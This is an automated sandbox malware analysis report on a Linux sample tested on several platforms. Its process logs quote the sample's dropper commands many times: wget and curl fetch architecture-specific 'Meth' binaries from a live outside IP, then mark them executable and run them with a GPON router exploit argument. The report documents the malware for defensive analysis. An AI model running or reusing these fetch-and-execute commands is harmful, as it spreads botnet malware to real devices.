Malware Analysis Report

2024-10-24 21:20

Sample ID 240728-ejmn7azgja
Target 084300db84b72d190951f7cca78ee9e3_JaffaCakes118
SHA256 d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f

Threat Level: Shows suspicious behavior

The file 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-28 03:58

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-28 03:58

Reported

2024-07-29 11:33

Platform

debian9-mipsel-20240729-en

Max time kernel

77s

Max time network

78s

Command Line

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sn0rt /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 N/A

Processes

/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/bin/cat

[cat Meth.x86]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/bin/cat

[cat Meth.mips]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/bin/cat

[cat Meth.mpsl]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/bin/cat

[cat Meth.arm]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/bin/cat

[cat Meth.arm5]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/bin/cat

[cat Meth.arm6]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/bin/cat

[cat Meth.arm7]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/bin/cat

[cat Meth.ppc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/bin/cat

[cat Meth.m68k]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/bin/cat

[cat Meth.spc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/bin/cat

[cat Meth.i686]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/bin/cat

[cat Meth.sh4]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/bin/cat

[cat Meth.arc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 03:58

Reported

2024-07-29 11:33

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

79s

Max time network

128s

Command Line

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sn0rt /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 N/A

Processes

/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/bin/cat

[cat Meth.x86]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/bin/cat

[cat Meth.mips]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/bin/cat

[cat Meth.mpsl]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/bin/cat

[cat Meth.arm]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/bin/cat

[cat Meth.arm5]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/bin/cat

[cat Meth.arm6]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/bin/cat

[cat Meth.arm7]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/bin/cat

[cat Meth.ppc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/bin/cat

[cat Meth.m68k]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/bin/cat

[cat Meth.spc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/bin/cat

[cat Meth.i686]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/bin/cat

[cat Meth.sh4]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/bin/cat

[cat Meth.arc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
HR 45.95.168.230:80 tcp
N/A 224.0.0.251:5353 udp
GB 89.187.167.38:443 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-28 03:58

Reported

2024-07-29 11:33

Platform

debian9-armhf-20240729-en

Max time kernel

78s

Max time network

79s

Command Line

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sn0rt /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 N/A

Processes

/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/bin/cat

[cat Meth.x86]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/bin/cat

[cat Meth.mips]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/bin/cat

[cat Meth.mpsl]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/bin/cat

[cat Meth.arm]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/bin/cat

[cat Meth.arm5]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/bin/cat

[cat Meth.arm6]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/usr/bin/curl

